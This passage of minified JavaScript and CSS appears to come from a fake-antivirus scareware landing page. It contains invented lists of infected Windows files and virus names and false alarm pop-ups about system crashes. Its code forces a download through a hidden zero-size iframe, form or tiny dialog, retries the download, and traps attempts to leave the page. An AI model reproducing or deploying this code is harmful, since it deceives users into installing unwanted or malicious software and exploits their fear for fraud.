0;height:2px;width:206px;font-size:1px;}#centrallanding_left_3{width:186px;background-position:-206px 0;background-repeat:repeat-y;position:relative;margin-top:7px;margin-left:6px;font-size:11px;padding-top:28px;padding-bottom:13px;padding-left:10px;line-height:1.4;padding-right:10px;margin-top:15px;}#centrallanding_top_3{position:absolute;left:0;top:0;height:19px;width:192px;font-size:11px;font-weight:bold;font-family:tahoma;color:#345ab8;padding-left:14px;padding-top:4px;}#centrallanding_bottom_3{position:absolute;left:0;bottom:0;background-position:-412px 0;height:2px;width:206px;font-size:1px;}.centrallanding_left_inner{position:relative;font-size:11px;font-family:tahoma;color:#345ab8;padding-left:20px;height:17px;padding-top:1px;cursor:pointer;margin-top:6px;width:150px;}.centrallanding_left_inner img{position:absolute;left:0;top:0;}#centrallanding_left_img_1{position:absolute;left:0;top:0;width:15px;height:16px;background-position:0 -406px;}#centrallanding_left_img_2{position:absolute;left:0;top:0;width:16px;height:16px;background-position:0 -422px;}#centrallanding_left_img_3{position:absolute;left:0;top:0;width:16px;height:16px;background-position:0 -438px;}#centrallanding_left_img_4{position:absolute;left:0;top:0;width:16px;height:16px;background-position:0 -454px;}#centrallanding_left_img_5{position:absolute;left:0;top:0;width:16px;height:16px;background-position:0 -470px;}#centrallanding_left_img_6{position:absolute;left:0;top:0;width:16px;height:14px;background-position:0 -486px;}#centrallanding_left_img_7{position:absolute;left:0;top:0;width:16px;height:17px;background-position:0 -500px;}.centrallanding_x{background:url(Layouts\/Landings\/CentralLandings\/6\/images\/list\/x.gif) no-repeat;}#x_1{width:33px;height:40px;float:left;margin-right:13px;background-position:0 -727px;}#x_2{width:25px;height:30px;background-position:0 -767px;float:left;margin-right:5px;}.centrallanding_right_1{position:relative;margin-left:15px;margin-top:10px;font-size:11px;font-weight:bold;}.centrallanding_right_1 span{color:#e20101;}#centrallanding_grad_1{width:329px;height:1px;margin-top:5px;background-position:0 -726px;font-size:1px;overflow:hidden;}#centrallanding_grad_2{width:329px;height:1px;margin-top:5px;background-position:0 -726px;font-size:1px;overflow:hidden;}#centrallanding_grad_3{width:329px;height:1px;margin-top:5px;background-position:0 -726px;font-size:1px;overflow:hidden;}#centrallanding_folder_1{width:130px;height:38px;background-repeat:no-repeat;padding-left:45px;background-position:0 -303px;padding-top:10px;font-size:11px;margin-left:25px;margin-top:15px;}#centrallanding_virus_1{height:14px;background-position:0 -797px;padding-left:20px;margin-top:5px;font-size:11px;font-weight:bold;color:#de0000;padding-top:2px;visibility:hidden;}#centrallanding_virus_2{height:14px;background-position:0 -797px;padding-left:20px;margin-top:5px;font-size:11px;font-weight:bold;color:#de0000;padding-top:2px;visibility:hidden;}#centrallanding_virus_3{height:14px;background-position:0 -797px;padding-left:20px;margin-top:5px;font-size:11px;font-weight:bold;color:#de0000;padding-top:2px;visibility:hidden;}#centrallanding_folder_2{width:140px;height:38px;background-repeat:no-repeat;padding-left:45px;background-position:0 -303px;padding-top:10px;font-size:11px;position:absolute;left:235px;top:45px;}#centrallanding_hdd_1{width:150px;height:38px;background-position:0 -356px;background-repeat:no-repeat;padding-left:55px;padding-top:5px;font-size:11px;margin-left:20px;margin-top:10px;}#centrallanding_sec_1{width:250px;height:38px;background-position:0 -518px;padding-left:55px;padding-top:10px;font-size:11px;margin-left:20px;margin-top:10px;}.centrallanding_virus_2{height:14px;margin-top:5px;font-size:11px;font-weight:bold;color:#de0000;padding-top:2px;visibility:hidden;}#centrallanding_scroll1{width:253px;height:17px;font-size:12px;font-weight:bold;background-position:-1562px 0;margin-top:15px;margin-left:15px;padding-top:3px;padding-left:260px;position:relative;}#centrallanding_scroll1 span{position:relative;z-index:1;}#centrallanding_scroll_bg{position:absolute;left:5px;top:3px;width:0;height:15px;background-position:-1568px -25px;z-index:0;}#centrallanding_table{width:513px;height:211px;background-position:-1049px 0;position:relative;margin-top:5px;margin-left:15px;visibility:hidden;}.centrallanding_progress{margin-left:20px;font-size:11px;color:#4b4b4b;margin-top:2px;}.centrallanding_inner_table{width:480px;margin-left:15px;margin-top:48px;}.centrallanding_table_tr_1 td{background:url(Layouts\/Landings\/CentralLandings\/6\/images\/list\/tr_bg.gif) repeat-x;font-family:verdana;font-size:11px;padding-left:8px;}.centrallanding_inner_table_cont{width:480px;margin-left:15px;height:97px;overflow:auto;}.centrallanding_inner_table_2 td{height:18px;padding-left:5px;font-size:11px;}.centrallanding_table_text{font-size:16px;color:#FFF;position:absolute;left:43px;top:8px;}.centrallanding_recommend{position:absolute;left:18px;bottom:15px;font-size:11px;}.centrallanding_start{position:absolute;right:15px;bottom:10px;cursor:pointer;}.centrallanding_table_divider{background:url(Layouts\/Landings\/CentralLandings\/6\/images\/list\/table_divider.gif);}#divider1{width:4px;height:20px;background-position:0 0;}#divider2{width:4px;height:20px;background-position:0 0;}#cl_alert{font-family:tahoma;}#cl_main{width:436px;height:350px;background-position:0 -20px;position:relative;}.close{width:25px;height:25px;position:absolute;top:0;right:0;cursor:pointer;}.move{width:410px;height:25px;position:absolute;top:0;left:0;}.spacer{width:1px;height:1px;font-size:1px;}.text1{position:relative;margin-top:50px;margin-left:60px;width:355px;font-family:Verdana,Geneva,sans-serif;font-size:11px;font-weight:bold;color:#FFF;}.cl_viruses{width:410px;position:absolute;height:103px;top:135px;left:11px;overflow:auto;}.virus{float:left;width:280px;padding-left:5px;font-family:Tahoma,Geneva,sans-serif;font-size:11px;color:#F00;font-weight:bold;}.virusname{font-size:11px;}.text2{bottom:10px;left:50px;width:365px;font-size:11px;font-family:Tahoma,Geneva,sans-serif;position:absolute;}.remove{position:absolute;left:220px;top:250px;width:93px;height:22px;cursor:pointer;}.cancel{position:absolute;left:332px;top:250px;width:93px;height:22px;cursor:pointer;}.virus_1_1{padding-left:18px;position:relative;height:17px;padding-top:3px;font-size:11px;font-family:tahoma;}.cl_alert{width:436px;height:350px;margin-left:auto;margin-right:auto;}","centralLandingCSSFile":"Layouts\/Landings\/CentralLandings\/6\/css\/centralLanding.css","centralLandingImagesList":[{"path":"Layouts\/Landings\/CentralLandings\/6\/images\/list\/all_hor.gif","width":2075,"height":211},{"path":"Layouts\/Landings\/CentralLandings\/6\/images\/list\/all_vert.gif","width":389,"height":900},{"path":"Layouts\/Landings\/CentralLandings\/6\/images\/list\/table_divider.gif","width":4,"height":20},{"path":"Layouts\/Landings\/CentralLandings\/6\/images\/list\/tr_bg.gif","width":3,"height":20}],"instructionType":null,"exitAlerts":[["To prevent your PC from crash, press CANCEL.","C"],["Risk of system crash. Press CANCEL to repair.","C"],["System slowdown detected. Press CANCEL to repair now.","C"],["System has been slowed down due to malicious activity. Press OK to optimize.","O"],["Press OK to protect your PC from system freezes.","O"],["Risk of system slowdown. Press OK to optimize.","O"]],"isAggressive":false,"isFullyClickable":true,"isPreLoadImages":true,"isDebugModeOn":false,"properties":{"ls":6,"uid":149}};var storage={preLandings:{},centralLandings:{},common:{}};storage.preLandings.files=["c:\\windows\\","c:\\windows\\temp\\","c:\\windows\\system32\\","c:\\windows\\system\\","c:\\..\\LocalService\\Local Settings\\Temporary Internet Files\\","c:\\..\\Local Settings\\Temporary Internet Files\\Content.IE5\\","c:\\..\\Default User\\Application Data\\","c:\\..\\Default User\\Application Data\\Microsoft\\","c:\\..\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\41M38XIN","c:\\..\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\SLA3S5Q3","c:\\..\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\GPM705EJ","c:\\..\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\G9IFC5QB","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\G1DAX1FU\\","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\IIB5GURM\\","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\JI0DTJNL\\","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\JV0YX9HC\\","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\JZXJ3EK1\\","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\LQQEDB6F\\"];storage.centralLandings.files=["c:\\windows\\Active Setup Log.txt","c:\\windows\\mcd32.dll","c:\\windows\\temp\\forcedos.exe","c:\\windows\\temp\\edit.hlp","c:\\windows\\system32\\defrag.exe","c:\\windows\\system32\\actmovie.exe","c:\\windows\\system\\icfgnt5.dll","c:\\windows\\system\\KGyGaAvL.sys","c:\\windows\\mcd32.dll","c:\\windows\\temp\\forcedos.exe","c:\\windows\\temp\\edit.hlp","c:\\windows\\system32\\defrag.exe","c:\\windows\\system32\\actmovie.exe","c:\\windows\\system\\icfgnt5.dll","c:\\windows\\system\\KGyGaAvL.sys","c:\\..\\LocalService\\Local Settings\\Temporary Internet Files\\advpack.dll","c:\\..\\LocalService\\Local Settings\\Temporary Internet Files\\msacm32.dll","c:\\..\\Local Settings\\Temporary Internet Files\\Content.IE5\\hotplug.dll","c:\\..\\Default User\\Application Data\\d3drm.dll","c:\\..\\Default User\\Application Data\\mpr.dll","c:\\..\\Default User\\Application Data\\Microsoft\\Arj.pif","c:\\..\\Default User\\Application Data\\Microsoft\\mfc70fra.dll","c:\\..\\NTUSER.DAT","c:\\..\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\G1DAX1FU\\explorer.exe","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\IIB5GURM\\atmadm.exe","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\JI0DTJNL\\d3dx10_37.dll","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\JV0YX9HC\\ALCMTR.EXE","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\JZXJ3EK1\\d3drm.dll","c:\\..\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\LQQEDB6F\\FSSETUP.log","c:\\downloads\\control.ini","c:\\downloads\\mfc70fra.dll","c:\\RECYCLER\\mmcfxcommon.dll","c:\\RECYCLER\\bootcfg.exe","c:\\RECYCLER\\c_28592.nls","c:\\System Volume Information\\appmgr.dll","c:\\System Volume Information\\dsound3d.dll"];storage.common.folders=["c:\\windows\\","c:\\..\\LocalService\\Local Settings\\Temporary Internet Files\\","c:\\..\\Local Settings\\Temporary Internet Files\\Content.IE5\\","c:\\..\\Default User\\Application Data\\","c:\\..\\Default User\\Application Data\\Microsoft\\","c:\\Documents and Settings\\All Users\\Application Data\\","c:\\Documents and Settings\\Default User\\Application Data\\","c:\\Documents and Settings\\Default User\\Local Settings\\","c:\\downloads\\","c:\\RECYCLER\\","c:\\System Volume Information\\"];storage.common.filenames=["0.log","_default.pif","Active Setup Log.txt","ALCMTR.EXE","ALCWZRD.EXE","always.bat","bootstat.dat","cdplayer.ini","clock.avi","cmsetacl.log","comsetup.log","control.ini","corelpf.lrs","desktop.ini","DirectX.log","DtcInstall.log","erg_dial.ini","erg_film.ini","explorer.exe","explorer.scf","FaxSetup.log","FinishDrv.log","FontData.fdb","SDEPH.log","FSISU.log","FSPROD.log","FSSFM.log","FSSGUI.log","Giza Setup Log.txt","activeds.tlb","ahui.exe","apphelp.dll","appmgmts.dll","appmgr.dll","atmadm.exe","atmlib.dll","bootcfg.exe","bthprops.cpl","c_949.nls","c_28592.nls","catsrvps.dll","cidaemon.exe","cmmgr32.hlp","commdlg.dll","cryptdll.dll","d3drm.dll","d3dx10_37.dll","defrag.exe","dhcpcsvc.dll","dmadmin.exe","docprop2.dll","dpvacm.dll","dsound3d.dll","edit.hlp","extrac32.exe","forcedos.exe","gpupdate.exe","hotplug.dll","icfgnt5.dll","igfxrell.lrc","kbdhe220.dll","kbdpl1.dll","KGyGaAvL.sys","loadperf.dll","mcd32.dll","mfc70fra.dll","mpr.dll","msacm32.dll","alg.exe","arp.exe","atmfd.dll","avicap.dll","avicap32.dll","calc.exe","camocx.dll","explorer.exe","hh.exe","HideWin.exe","IsUninst.exe","meta4.exe","MicCal.exe","NOTEPAD.EXE","regedit.exe","TASKMAN.EXE","twunk_16.exe","twunk_32.exe","winhelp.exe","winhlp32.exe","x2.64.exe","twain.dll","twain_32.dll","vmmreg32.dll","bootstat.dat","d3dx.dat","nsreg.dat","popcinfo.dat","SET3.tmp","SET4.tmp","SET8.tmp","accwiz.exe","actmovie.exe","ahui.exe","winspool.exe","winver.exe","WISPTIS.EXE","wowdeb.exe","wowexec.exe","wpabaln.exe","wpnpinst.exe","write.exe","wscntfy.exe","wscript.exe","wuauclt.exe","wuauclt1.exe","wupdmgr.exe","cic.dll","ciodm.dll","clb.dll","clbcatex.dll","clbcatq.dll","cliconfg.dll","cygwin1.dll","cygz.dll","d3d8.dll","d3d8thk.dll","d3d9.dll","drmclien.dll","drmstor.dll","drmv2clt.dll","drprov.dll","ds16gt.dLL","ds32gt.dll","dsauth.dll","dsdmo.dll","ieakeng.dll","ieaksie.dll","ieakui.dll","ieapfltr.dll","iedkcs32.dll","ieencode.dll","ieframe.dll","iepeers.dll","iernonce.dll","iertutil.dll","iesetup.dll","ieui.dll","kerberos.dll","kernel32.dll","keymgr.dll","ksuser.dll","kwutil2k.dll","sti_ci.dll","stobject.dll","storage.dll","storprop.dll","streamci.dll","strmdll.dll","strmfilt.dll","svcpack.dll","swprv.dll","sxs.dll","untfs.dll","upnp.dll","upnphost.dll","upnpui.dll","ureg.dll","url.dll","urlmon.dll","usbmon.dll","usbui.dll","user32.dll","dssec.dat","emptyregdb.dat","ezsidmv.dat","FNTCACHE.DAT","ieapfltr.dat","imon1.dat","mlang.dat","noise.dat","oembios.dat","perfc009.dat","perfc019.dat","perfd009.dat","perfd019.dat","perfh009.dat","perfh019.dat","perfi009.dat","perfi019.dat","secupd.dat","ansi.sys","country.sys","himem.sys","key01.sys","keyboard.sys","ntdos.sys","ntdos404.sys","ntdos411.sys","ntdos412.sys","ntdos804.sys","ntio.sys","ntio404.sys","ntio411.sys","ntio412.sys","ntio804.sys","watchdog.sys","win32k.sys"];storage.common.databaseFilenames=["base002.avc","base002c.avc","base003.avc","base003c.avc","base004.avc","base004c.avc","base005.avc","base005c.avc","base006.avc","base006c.avc","base007.avc","base007c.avc","base008.avc","base008c.avc","base009.avc","base009c.avc","base010.avc","base010c.avc","base011.avc","base011c.avc","base012.avc","base012c.avc","base013.avc","base013c.avc","base014.avc","base014c.avc","base015.avc","base015c.avc","base016.avc","base016c.avc","base017.avc","base017c.avc","base018.avc","base018c.avc","base019.avc","base019c.avc","base020.avc","base020c.avc","base021.avc","base021c.avc","base022.avc","base022c.avc","base023.avc","base023c.avc","base024.avc","base024c.avc","base025.avc","base025c.avc","base026.avc","base026c.avc","base027.avc","base027c.avc","base028.avc","base028c.avc","base029.avc","base029c.avc","base030.avc","base030c.avc","base031.avc","base031c.avc","base032.avc","base032c.avc","base033.avc","base033c.avc","base034.avc","base034c.avc","base035.avc","base035c.avc","base036.avc","base036c.avc","base037.avc","base037c.avc","base038.avc","base038c.avc","base039.avc","base039c.avc","base040.avc","base040c.avc","base041.avc","base041c.avc","base042.avc","base042c.avc","base043.avc","base043c.avc","base044.avc","base044c.avc","base045.avc","base045c.avc","base046.avc","base046c.avc","base047.avc","base047c.avc","base048.avc","base048c.avc","base049.avc","base049c.avc","base050.avc","ca.avc","ca001.avc","ca002.avc","ca003.avc","chuka.avc","daily.avc","dailyc.avc","eicar.avc","ext001.avc","ext001c.avc","ext002.avc","ext002c.avc","ext003.avc","ext003c.avc","ext004.avc","ext004c.avc","ext005.avc","ext005c.avc","ext006.avc","ext006c.avc","ext007.avc","ext007c.avc","ext008.avc","ext008c.avc","ext009.avc","ext009c.avc","ext010c.avc","ext011c.avc","ext012c.avc","ext013c.avc","ext014c.avc","ext015c.avc","ext999.avc","fa.avc","fa001.avc","gen001.avc","gen002.avc","gen003.avc","gen004.avc","gen005.avc","gen999.avc","kernel.avc","krn001.avc","krn002.avc","krn003.avc","krn004.avc","krn005.avc","krndos.avc","krnengn.avc","krnexe.avc","krnexe32.avc","krngen.avc","krnjava.avc","krnmacro.avc","krnun001.avc","krnun002.avc","krnun003.avc","krnun004.avc","krnunp.avc","mail.avc","ocr.avc","smart.avc","unp000.avc","unp001.avc","unp002.avc","unp003.avc","unp004.avc","unp005.avc","unp006.avc","unp007.avc","unp008.avc","unp009.avc","unp010.avc","unp011.avc","unp012.avc","unp013.avc","unp014.avc","unp015.avc","urgent.avc"];storage.centralLandings.virusNames=[["Adware.Win32.Winad","Critical"],["Adware.Win32.Look2me.ab","Critical"],["AdvWare.Hotbar","High"],["Backdoor.Win32.Haxdoor.gu","High"],["Trojan-Downloader.Win32.Small.dge","High"],["Trojan-PSW.Win32.LdPinch.abm","Critical"],["Trojan.Qoologic - Key Logger","High"],["Trojan Horse IRC/Backdoor.SdBot4.FRV","Medium"],["SHeur.ZSQ","High"],["W32.Benjamin.Worm","High"],["W95/Elkern F-Secure","High"],["W32.Mypics.Worm.36352","Medium"],["W32.Nimda.J@mm","Medium"],["W32.Yaha.B@mm","Critical"],["Trojan Horse Generic11.OQJ","High"],["Trojan Horse IRC/Backdoor.SdBot4.FRV","Critical"],["Magic DVD Ripper","High"],["Trojan virtumonde","Critical"],["Win32/Hoax.Renos.HX","Medium"],["Trojan-Downloader.Win32.Small.fxf","Medium"],["Trojan-Downloader.Win32.Tibs.tc","Medium"],["Trojan.Fakealert.355","Medium"]];var kPromo={base:{queryParameters:"",downloadFrame:null,downloadForm:null},common:{isLoadingIndicatorActive:true,isExitAlertDialogInIEUsed:false,isAggressionActive:false,isDebugModeOn:false,isFullyCkickable:false,isPreLoadImages:true,alertPopUpsCount:0,downloadAttemptsCount:0}};kPromo.constants={common:{queueProcessTimeout:500,cyclicDownloadTimeout:10000,centralLandingExecutionBlockDelay:200,loadingMaskID:"loading"},alerts:{alertsPopUpDefaultCount:7,defaultAlertMessage:"Are you sure about aborting initialization of protection system?"},landings:{preLandingID:"preLanding",centralLandingID:"centralLanding",postLandingID:"postLanding",preLandingOSLabelID:"os_label",preLandingBrowserLabelID:"browser_label",preLandingScanTimeLabelID:"scantime_label"},instructions:{instructionID:"instruction",defaultIdIEInstructionsStepOneDiv:"step1",defaultIdIEInstructionsStepTwoSubDiv:"subDivStep2",defaultIdIEInstructionsStepThreeSubDiv:"subDivStep3",defaultIdIEInstructionsStepFour:"step4",defaultIdIEInstructionsLeftBorder:"leftBorder",defaultIdIEInstructionsRightBorder:"rightBorder",defaultIdIEInstructionsMainContent:"mainContent",defaultIdIEInstructionsBordersContent:"bordersContent",defaultHeightIEInstructionsWithoutPopupBordersContent:"530",defaultMarginTopIEInstructionsWithoutPopupStepFour:"39",defaultMarginTopIE6InstructionsWithoutPopupStepFour:"9",defaultHeightIEInstructionsWithPopupBordersContent:"677",defaultMarginTopIEInstructionsWithPopupStepFour:"23",defaultMarginTopIE6InstructionsWithPopupStepFour:"0"},css:{engine:".root {\n width: 100%;\n height: 100%;\n}\n\n.backgroundOpacityLayer {\n background-color: #000000;\n position: absolute;\n top: 0px;\n left: 0px;\n width: 100%;\n height: 100%;\n opacity: 0.75;\n -moz-opacity: 0.75;\n -khtml-opacity: 0.75;\n filter: progid:DXImageTransform.Microsoft.Alpha( opacity = 75 );\n z-index: 50;\n}\n\n.foregroundContentLayer {\n position: absolute;\n top: 0px;\n left: 0px;\n}\n\n#loading {\n position: absolute;\n left: 45%;\n top: 40%;\n padding: 2px;\n z-index: 20001;\n height: auto;\n}\n\n#loading a {\n color: #225588;\n}\n\n#loading .loading-indicator {\n background: white;\n color: #444;\n font: bold 13px tahoma, arial, helvetica;\n padding: 10px;\n margin: 0;\n height: auto;\n}\n\n#loading-msg {\n font: normal 10px arial, tahoma, sans-serif;\n}",preLandingCssTestElement:"preLandingCssTestElement",centralLandingCssTestElement:"centralLandingCssTestElement",postLandingCssTestElement:"postLandingCssTestElement",instructionCssTestElement:"instructionCssTestElement",cssTestElementDefaultWidth:2}};kPromo.closeWindow=function(a){if(kPromo.browser.isIE){if(a){window.location.href="about:blank"}window.parent.window.opener=null;window.parent.window.close()}else{if(a){document.location.href="about:blank"}top.window.opener=top;top.window.open("","_parent","");top.window.close()}};kPromo.executeRedirect=function(a){window.onbeforeunload=null;if(kPromo.browser.isIE){window.location=a}else{document.location.href=a}};kPromo.initiateDownload=function(){if(kPromo.instructions.property.instructionType!=null){kPromo.instructions.showInstruction()}kPromo.common.downloadAttemptsCount++;if(kPromo.browser.isOpera){kPromo.executeDownloadThroughForm()}else{if(kPromo.browser.isIE6&&kPromo.instructions.property.isInstructionActive){kPromo.executeDownloadThroughDialog()}else{kPromo.executeDownloadThroughFrame()}}};kPromo.executeDownloadThroughForm=function(){if(kPromo.base.downloadForm==null){kPromo.base.downloadForm=document.createElement("form");kPromo.base.downloadForm.method="POST";kPromo.document.head.appendChild(kPromo.base.downloadForm)}kPromo.base.downloadForm.action=kPromo.getDownloadURL();window.onbeforeunload=null;kPromo.base.downloadForm.submit();window.onbeforeunload=kPromo.events.onUnloadEventHandler};kPromo.executeDownloadThroughFrame=function(){if(kPromo.base.downloadFrame==null){kPromo.base.downloadFrame=document.createElement("iframe");kPromo.base.downloadFrame.setAttribute("style","width:0px; height:0px; border: 0px; scrolling:no;");document.body.appendChild(kPromo.base.downloadFrame)}if(kPromo.browser.isIE){kPromo.base.downloadFrame.onreadystatechange=function(){if(kPromo.base.downloadFrame.readyState=="interactive"){setTimeout("window.onbeforeunload = kPromo.events.onUnloadEventHandler;",100)}};window.onbeforeunload=null}kPromo.base.downloadFrame.src=kPromo.getDownloadURL()};kPromo.executeDownloadThroughDialog=function(){var a=kPromo.getDownloadURL();var b="dialogWidth:2px; dialogHeight:2px; dialogTop:1px; dialogLeft:1px; edge:Raised; center:1; help:0; resizable:1; scroll:1; status:0";window.open(a,"",b)};kPromo.getDownloadURL=function(){return"build"+kPromo.strategy.properties.ls+"_"+kPromo.strategy.properties.uid+".php?cmd=getFile&counter="+kPromo.common.downloadAttemptsCount+"&"+kPromo.base.queryParameters};kPromo.saveQueryParameters=function(){var a=location.search;kPromo.base.queryParameters=a.replace("?","")};kPromo.time={};kPromo.time.getCurrentFullTime=function(){var b=new Date();var c=b.getHours();var a=(c>11&&c<24)?"P.M":"A.M";c=(c>=12&&c<24)?(c-12):c;return b.getDate()+"."+(b.getMonth()+1)+"."+b.getFullYear()+" "+c+":"+b.getMinutes()+" "+a};kPromo.browser={isIE:false,isIE6:false,isIE7:false,isOpera:false,isFirefox:false,isSafari:false,isKonqueror:false,isChrome:false,version:""};kPromo.browser.init=function(){var c=navigator.userAgent.toLowerCase();kPromo.browser.isOpera=(c.indexOf("opera")!=-1);kPromo.browser.isIE=!kPromo.browser.isOpera&&((c.indexOf("msie")!=-1))&&window.attachEvent;kPromo.browser.isIE6=!kPromo.browser.isOpera&&(c.indexOf("msie 6")>-1);kPromo.browser.isIE7=!kPromo.browser.isOpera&&(c.indexOf("msie 7")>-1);kPromo.browser.isFirefox=((c.indexOf("firefox")!=-1));kPromo.browser.isChrome=(c.indexOf("chrome")>-1);kPromo.browser.isSafari=!kPromo.browser.isChrome&&(/webkit|khtml/).test(c);kPromo.browser.isKonqueror=(c.indexOf("konqueror")!=-1);if(kPromo.browser.isFirefox){var d=/firefox\/([0-9\.]*)/ig;var a=d.exec(c);kPromo.browser.version=a!=null?a[1]:null}else{if(kPromo.browser.isOpera){d=/opera\/([0-9\.]*)/ig;a=d.exec(c);kPromo.browser.version=a!=null?a[1]:null}else{if(kPromo.browser.isKonqueror){d=/konqueror\/([0-9\.]*)/ig;a=d.exec(c);kPromo.browser.version=a!=null?a[1]:null}else{if(kPromo.browser.isIE){d=/msie\s([0-9\.]*)/ig;a=d.exec(c);kPromo.browser.version=a!=null?a[1]:null}else{if(kPromo.browser.isSafari){d=/safari\/([0-9\.]*)/ig;a=d.exec(c);kPromo.browser.version=a!=null?a[1]:null;if(a!=null){if(a[1]>=312.6&&a[1]<416){kPromo.browser.version="1.3.2"}else{if(a[1]>=416&&a[1]<418){kPromo.browser.version="2.0.2"}else{if(a[1]>=418&&a[1]<522){kPromo.browser.version="2.0.4"}else{if(a[1]>=522&&a[1]<524){kPromo.browser.version="3.0.4"}else{if(a[1]>=524&&a[1]<526){kPromo.browser.version="3.1.1"}}}}}}}else{if(kPromo.browser.isChrome){kPromo.browser.version=navigator.userAgent.replace(/^.*Chrome\/([\d\.]+).*$/i,"$1")}}}}}}if(kPromo.browser.isIE&&!kPromo.browser.isIE7){try{document.execCommand("BackgroundImageCache",false,true)}catch(b){}}};kPromo.browser.getVersion=function(){if(kPromo.browser.version!=null){return kPromo.browser.version}else{return"[Unknown Version]"}};kPromo.browser.toFullName=function(){var a=kPromo.browser.isIE?"Internet Explorer ":kPromo.browser.isFirefox?"Firefox ":kPromo.browser.isOpera?"Opera ":kPromo.browser.isSafari?"Safari ":kPromo.browser.isChrome?"Google Chrome ":kPromo.browser.isKonqueror?"Konqueror ":"Unknown Browser ";return a+kPromo.browser.getVersion()};kPromo.os={isXP:false,isWin2003:false,isVista:false,isWinMe:false,isWin95:false,isWin98:false,isWin2k:false,isWindows:false};kPromo.os.init=function(){var a=navigator.userAgent;kPromo.os.isWin95=(a.indexOf("95")!=-1&&a.indexOf("Win")!=-1);kPromo.os.isWin98=(a.indexOf("98")!=-1&&a.indexOf("Win")!=-1);kPromo.os.isWinMe=(a.indexOf("98")!=-1&&a.indexOf("Win 9x 4.90")!=-1);kPromo.os.isWin2k=(a.indexOf("NT 5.0")!=-1);kPromo.os.isXP=(a.indexOf("NT 5.1")!=-1);kPromo.os.isWin2003=(a.indexOf("NT 5.2")!=-1);kPromo.os.isVista=(a.indexOf("NT 6.0")!=-1);kPromo.os.isWindows=(a.indexOf("windows")!=-1||a.indexOf("win32")!=-1)};kPromo.os.toFullName=function(){return kPromo.os.isVista?"Vista":kPromo.os.isXP?"Windows XP":kPromo.os.isWin2k?"Windows 2000":kPromo.os.isWin98?"Windows 98":kPromo.os.isWin95?"Windows 95":kPromo.os.isWinMe?"Windows ME":kPromo.os.isWin2003?"Windows Server 2003":kPromo.os.isWindows?"Windows NT":"Unknown OS"};kPromo.document={head:null,body:null};kPromo.document.getElementContentsByTagName=function(b,a){var c=document.getElementsByTagName(b);if(c==undefined){return false}else{if(c.length==0){return false}}if(a!=undefined){if(c[a]!=undefined){return c[a]}else{return false}}else{return c}};kPromo.document.getDocumentElementByID=function(b){var a=document.getElementById(b);return a!=undefined?a:false};kPromo.document.createDivElement=function(e,d,a,c){var b=document.createElement("div");if(e!=null){b.setAttribute("id",e)}if(!a){b.style.display="none"}if(c!=null){b.setAttribute("style",c)}if(d!=null){b.innerHTML=d}return b};kPromo.document.setDivContents=function(c,b){var a=document.getElementById(c);if(a){a.innerHTML=b}};kPromo.document.getWindowDimensionsWithoutScroll=function(){if(kPromo.browser.isIE){var a={width:document.documentElement.clientWidth,height:document.documentElement.clientHeight}}else{a={width:window.innerWidth,height:window.innerHeight}}return a};kPromo.document.getWindowDimensionsWithScroll=function(){if(kPromo.browser.isIE){var a={width:document.documentElement.scrollWidth,height:document.documentElement.scrollHeight}}else{a={width:document.body.parentNode.scrollWidth,height:document.body.parentNode.scrollHeight}}return a};kPromo.document.getElementPosition=function(f,h){var c=f.offsetWidth;var j=f.offsetHeight;var e=0;var b=0;if(kPromo.browser.isIE){e=kPromo.css.getStyleValue(f,"marginLeft");b=kPromo.css.getStyleValue(f,"marginTop")}else{e=kPromo.css.getStyleValue(f,"margin-left");b=kPromo.css.getStyleValue(f,"margin-top")}if(e==null||e=="auto"){e=0}else{e=Number(e.replace("px",""))}if(b==null||b=="auto"){b=0}else{b=Number(b.replace("px",""))}var d=0;var g=0;if(h=="absolute"){while(f){d+=f.offsetLeft;g+=f.offsetTop;f=f.offsetParent}}else{if(kPromo.browser.isIE){g=Number(f.style.pixelTop);d=Number(f.style.pixelLeft)}else{g=f.style.top;d=f.style.left;g=Number(g.replace("px",""));d=Number(d.replace("px",""))}}d-=e;g-=b;var i=d+c;var a=g+j;return{left:d,top:g,right:i,bottom:a,width:c,height:j,marginLeft:e,marginTop:b}};kPromo.document.init=function(){window.onload=function(){var b=kPromo.document.getElementContentsByTagName("head",0);kPromo.document.head=(b)?b:null;var a=kPromo.document.getElementContentsByTagName("body",0);kPromo.document.body=(a)?a:null;kPromo.css.engineCSSNode=kPromo.css.createStyleSheet(kPromo.constants.css.engine,false);var c=document.getElementById("loading");c.style.display="block";kPromo.strategy.initialize()}};kPromo.images={queue:[],imagesPreLoadAlertsCount:0,timerID:0};kPromo.images.addQueue=function(b,a,d){for(var c=0;c<b.length;c++){var e=new Image(b[c].width,b[c].height);e.src=b[c].path;b[c]=e}kPromo.images.queue.push({callback:a,isReady:d,list:b,called:false});if(kPromo.images.timerID==0){kPromo.images.timerID=setTimeout(kPromo.images.processQueue,kPromo.constants.common.queueProcessTimeout)}};kPromo.images.processQueue=function(){kPromo.images.stopQueueProcessing();for(var c=0;c<kPromo.images.queue.length;c++){if(!kPromo.images.queue[c].called){var a=true;for(var 